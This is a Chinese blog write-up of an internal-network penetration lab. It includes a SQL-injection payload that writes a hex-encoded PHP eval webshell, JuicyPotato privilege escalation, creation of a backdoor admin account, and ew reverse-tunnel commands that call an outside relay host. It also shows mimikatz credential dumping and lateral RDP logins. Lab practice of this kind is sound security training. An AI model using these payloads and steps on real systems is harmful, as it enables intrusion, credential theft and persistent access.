内网渗透靶场(上)加入目标网段,抓取管理员密码 #zkaq
1、探测是否有sql注入:
(1)从ur看, 传递了id=1这个参数;这里有可能涉及到和数据库交互,为了确认是否存在sql注入,这里故意构造and 1=2这个false的条件,看看页面返回啥:
(2)果然页面报错,说明存在sql注入,并且还有个关键信息:当前页面在C:\phpStudy\WWW\ 这个目录下;
(3)通过order by看看当前表有多少字段:order by 2是正常的,order by 3就异常了,说明有2个字段;
(4)接着看看页面有没有报错点,方便后续观察结果:
发现页面一切正常;为了不让正常的页面干扰,这里故意提供一个false条件,发现第二个字段可以在页面显示;
(5)既然确认有sql注入,这里可以尝试看看dumpfile是否开启(注意:这里是url,反斜杠\有特殊的含义,需要再写一个转义)。如果开了,可以写小马;尝试后发现页面报错,
但文件已经写进去了,下一步写小马;
(6)先构造一个写小马的语句:and 1=2 union select 666666,<?php eval($_REQUEST[8])?> into dumpfile "C:\\phpStudy\\WWW\\config.txt",发现文件生成失败;很有可能是一句话小马里面有尖括号、问号导致的,这里先转成16进制编码:注意,原始字符串编码的时候会去掉空格,这里自己要手动加个20;
构造好的部分url: and 1=2 union select 666666,0x3c3f706870206576616c28245f524551554553545b385d293f3e into dumpfile "C:\\phpStudy\\WWW\\config.txt"; 放到url执行,还是报错:
但小马已经能访问到了:
把写入文件的后缀改成php,重新生成config.php,这里能正常执行:
2、小马已成,上菜刀,成功连接:
当前用户是administrator权限,还不是system,需要提权;os是windwos server 2008 R2;
通过systeminfo,发现打了两个补丁: [01]: KB2999226 [02]: KB976902;在提权辅助网站查询了一圈,能利用的exp还不少;
这里为了提权方便,直接用一款叫做“JuicyPotato”的工具,github有下,直接通过菜刀复制到网站的根目录;菜刀的虚拟终端没法通过tab键补全,打字不方便,这里重命名成1.exe,方便使用;同样是whoami指令,用了juicypotato工具,提权成了system,对比如下:
既然提权成功,这里添加一个system权限的用户:先新建用户
再添加到管理员组:
添加成功:
3、用户已创建,接着想办法远程登陆就可以为所欲为的;
(1) 靶机大概率在内网,需要主动连接我这边。但我没有公网ip,这里找个免费提供隧道的站点,申请一个隧道做反弹连接用:
(2) 接着监听本机的6666端口,这里用另外一个工具:ew_for_win_32.exe, 执行命令:ew_for_win_32.exe -s rcsocks -l 8888 -e 6666 , 一旦在本机6666端口接收到消息,转发到8888端口;
接着让靶机访问free.qydev.com:4965这个地址,就能中转到我的8888端口了;在靶机上,用菜刀打开终端,上传ew_for_win_32.exe,执行e.exe -s rssocks -d 47.92.102.131 -e 4965 命令,让靶机主动连接隧道中转站,在通过中转站连接到我本地;在菜刀执行,提示成功(这里注意两点:用双引号,而不是单引号; 用英文输入法):
至此,靶机的反向代理终于连接到我的8888端口,真心不容易,中间来回倒腾了好几层;
继续配置socket 5代理:
通过菜刀的虚拟终端,查询到靶机内网ip: 10.0.1.4,浏览器能直接打开对方的主页:
查询ip地址也是对方的:
这次终于可以通过3389远程桌面连接上了:
以这台内网机器为跳板,继续哟弄个nmap探测内部其他主机:同一个网段,还有3、6、8这3台服务器,6和8都开了3389端口,可能存在远程登陆的机会,账号是多少了?
同一个内网,可能只有1个管理员;管理员的账号大概率是一样的,否则记不住;这里用另一款神器:猕猴桃mimikatez,直接搜索内存找账号;
administrator的账号都有了,重新用这个连接:
自己创建的账号已经断开,administrator连上:
刚才既然用猕猴桃在内存中找到了密码,并且8这台主机也开了3389端口,这里用管理员账号尝试,居然成功登陆:
总结:
1、整个过程不难,每一步的逻辑都容易理解,就是全流程很繁琐,这里整理了一下核心步骤:
2、靶机、隧道中转站、攻击机三者的转发关系如下:靶机一般都在内网,通过路由器访问公网;攻击机也是通过路由访问公网,双方都没有独立的公网ip,只能找个隧道中转;
内网渗透靶场(上)加入目标网段,抓取管理员密码 #zkaq相关推荐
- 内网渗透靶场 Vulnstack(一)
虽然网上说这个靶场不是很难,但我自己做起来还是困难重重,很多知识不了解,msf与cs都搞了一下,搞了蛮久的,学到了不少,继续努力!!! 首先对内网域进行了解一下. 域是计算机网络的一种形式,其中所有用 ...
- 内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码
系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...
- CH4INRULZ_v1.0.1内网渗透靶场
nmap -T4 -A -p- 192.168.206.146 这里我们借助工具dirsearch对该网站进行目录扫描 http://192.168.206.146/development/ 然后再通 ...
- 三层网络靶场搭建MSF内网渗透
三层网络靶场搭建&MSF内网渗透 在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境.本文通过VMware搭 ...
- 记一次内网渗透测试实训总结
原文连接 前言 时间很快就来到了学期的最后一个月,和上学期一样,最后的几周是实训周,而这次实训恰好就是我比较喜欢的网络攻防,因为之前学过相关的知识,做过一些靶场,相比于其他同学做起来要快些,不过内网渗 ...
- 我猜你也在找内网渗透,这篇难道还不够你嚼烂?
内网渗透 前言 1.实验简介 网络拓扑图 2.环境搭建 第一层网络 第二层网络 第三层网络 最后 第一台Linux 第二台Linux 3.实验过程 第一层靶机 蚁剑连接 进一步做内网渗透,上传msf后 ...
- 一个实验了解多层内网渗透
原创:锦行安全平台部zy 近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防.因此,我们应该严格控制好网络区域之间的访问规则,加大攻击横向渗 ...
- 内网安全:内网渗透.(拿到内网主机最高权限 vulntarget 靶场 A)
内网安全:内网渗透.(拿到内网主机最高权限) 内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题.通过映射端口,让外网的电脑找到处于内 ...
- vulnstack内网渗透环境靶场-1 大全
一.搭建vulnstack靶场环境 主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址: http://vulnstack ...
- 内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板
靶场下载:漏洞详情 环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows se ...
最新文章
- 机械毕业本科生竟被嵌入式单片机公司录取?
- 手机和邮箱的正则表达式
- oracle drop table and purge
- SAP CRM Business partner API里的buffer设计
- 改变mysql的菜单栏的颜色_导航条——动态改变导航菜单的背景颜色
- 有经验的面试官都是如何快速判断程序员能力的?
- jasmine-JavaScript单元测试工具
- 揭秘硅谷传奇:惠普的创业故事
- 四足机器人--嵌入式硬件设计
- Python应用|绘制任意正态分布曲线
- WePhone手机软件已下架 疑因资金问题导致无法使用
- 弹幕网站开发(只有前端)
- unity常用组件功能介绍
- mac WPS 无格式粘贴
- 微软服务器分发,从 IIS 服务器分发 Windows 10 应用
- 【文学】平凡的世界第一部
- (转)10个月从五十音图到二级通过之经验
- 从500亿缩水到167亿!自动驾驶芯片第一股“流血上市”
- Python技能树测评报告
- 我的音乐自学道路上的好帮手---软件篇